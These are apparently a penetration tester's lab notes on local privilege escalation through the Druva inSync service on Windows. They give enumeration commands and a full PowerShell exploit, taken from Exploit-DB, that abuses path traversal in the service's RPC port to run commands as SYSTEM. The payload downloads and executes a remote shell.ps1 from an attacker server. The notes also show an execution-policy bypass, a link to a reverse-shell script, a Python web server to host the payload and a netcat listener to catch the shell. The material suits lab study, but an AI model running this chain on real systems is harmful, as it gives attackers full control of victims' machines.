Vulnerable Services

Recursos

• https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/

• https://www.netspi.com/blog/technical-blog/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/

---

Enumerating Installed Programs

wmic product get name

Enumerating Local Ports

netstat -ano | findstr 6064

Enumerating Process ID

get-process -Id 3324

Enumerating Running Service

get-service | ? {$_.DisplayName -like 'Druva*'}

Druva inSync PowerShell PoC

https://www.exploit-db.com/exploits/49211

$ErrorActionPreference = "Stop"

$cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.3:8080/shell.ps1')"

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

Modifying the PowerShell execution policy

Set-ExecutionPolicy Bypass -Scope Process

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Starting a Python Web Server

python3 -m http.server 8080

Catching a SYSTEM Shell

nc -lvnp 9443